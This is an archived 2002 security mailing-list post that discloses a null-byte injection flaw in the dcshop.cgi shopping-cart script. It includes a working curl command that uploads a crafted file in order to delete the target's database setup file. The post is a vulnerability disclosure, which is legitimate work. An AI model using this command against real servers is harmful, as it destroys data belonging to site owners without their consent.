dcshop.cgi anybody can delete *.setup for database

From: pokleyzz sakamaniaka (pokleyzzat_private)
Date: Mon Mar 25 2002 - 01:10:52 PST

Next message: ppp-design: "WebSight Directory System: cross-site-scripting bug"

Previous message: jelmer: "RE: Automatically opening IE + Executing attachments"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) cgi-pl in dcshop beta (http://www.dcscripts.com) allow user to using nullbyte character for variable if using multipart/form data type form. Using curl (http://curl.haxx.se/libcurl/) : curl -F database=@test.txt http://host/cgi- bin/dcshop.cgi which test.txt contain databasename.setup[nullbyte] will couse database.setup file being deleted

Next message: ppp-design: "WebSight Directory System: cross-site-scripting bug"
Previous message: jelmer: "RE: Automatically opening IE + Executing attachments"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Mar 25 2002 - 12:35:38 PST